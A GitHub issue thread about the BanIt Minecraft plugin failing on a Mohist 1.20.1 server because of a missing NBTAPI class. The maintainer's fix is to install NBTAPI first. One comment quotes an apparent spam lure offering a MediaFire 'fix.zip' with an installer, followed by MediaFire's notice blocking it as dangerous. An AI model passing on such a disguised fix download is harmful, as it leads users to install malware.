### ISSUE TITLE
[Bug]  严重错误，1.20.1 Mohist服务器 无法使用插件

### ISSUE THREAD

**Issue by Xbaishu** [Roinflam/BanIt#8]
服务器插件会优先读取该插件后再读取API插件导致错误无法正常启动
以下为日志记录

[20:30:00 ERROR]: 启用 BanIt v1.1.5 时发生错误 (它是最新的吗?)
java.lang.NoClassDefFoundError: de/tr7zw/nbtapi/NBTCompound
        at pers.tany.banit.Main.onEnable(Main.java:41) ~[?:?]
        at org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:348) ~[forge-1.20.1-47.3.5-universal.jar%23659!/:?]
        at org.bukkit.plugin.java.JavaPluginLoader.enablePlugin(JavaPluginLoader.java:338) ~[forge-1.20.1-47.3.5-universal.jar%23659!/:?]
        at org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:484) ~[forge-1.20.1-47.3.5-universal.jar%23659!/:?]
        at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugin(CraftServer.java:547) ~[forge-1.20.1-47.3.5-universal.jar%23659!/:997de31d-ddc9a2dad-d2eba2c8-47.1.105]
        at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugins(CraftServer.java:461) ~[forge-1.20.1-47.3.5-universal.jar%23659!/:997de31d-ddc9a2dad-d2eba2c8-47.1.105]
        at net.minecraft.server.MinecraftServer.m_129815_(MinecraftServer.java:445) ~[server-1.20.1-20230612.114412-srg.jar%23654!/:?]
        at net.minecraft.server.MinecraftServer.m_130006_(MinecraftServer.java:345) ~[server-1.20.1-20230612.114412-srg.jar%23654!/:?]
        at net.minecraft.server.dedicated.DedicatedServer.m_7038_(DedicatedServer.java:233) ~[server-1.20.1-20230612.114412-srg.jar%23654!/:?]
        at net.minecraft.server.MinecraftServer.m_130011_(MinecraftServer.java:855) ~[server-1.20.1-20230612.114412-srg.jar%23654!/:?]
        at net.minecraft.server.MinecraftServer.m_206580_(MinecraftServer.java:285) ~[server-1.20.1-20230612.114412-srg.jar%23654!/:?]
        at java.lang.Thread.run(Thread.java:833) [?:?]
Caused by: java.lang.ClassNotFoundException: de.tr7zw.nbtapi.NBTCompound
        at org.bukkit.plugin.java.PluginClassLoader.loadClass0(PluginClassLoader.java:186) ~[forge-1.20.1-47.3.5-universal.jar%23659!/:?]
        at org.bukkit.plugin.java.PluginClassLoader.loadClass(PluginClassLoader.java:138) ~[forge-1.20.1-47.3.5-universal.jar%23659!/:?]
        at java.lang.ClassLoader.loadClass(ClassLoader.java:520) ~[?:?]
        ... 12 more
[20:30:00 INFO]: [BanIt] 小小墨正在与 BanIt v1.1.5 插件断开连接
[20:30:00 INFO]: 「BanIt」已卸载

**Comment by Xbaishu** [comment]
> Download https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file In the installer menu, select "gcc."

危险文件被阻止
您尝试下载的文件被确定为危险文件。为了保护您的安全，MediaFire 不允许分发危险文件。

Dangerous File Blocked
The file you attempted to download was determined to be dangerous. For your protection, MediaFire does not enable distribution of dangerous files.

**Comment by Roinflam** [comment]
装NBTAPI前置
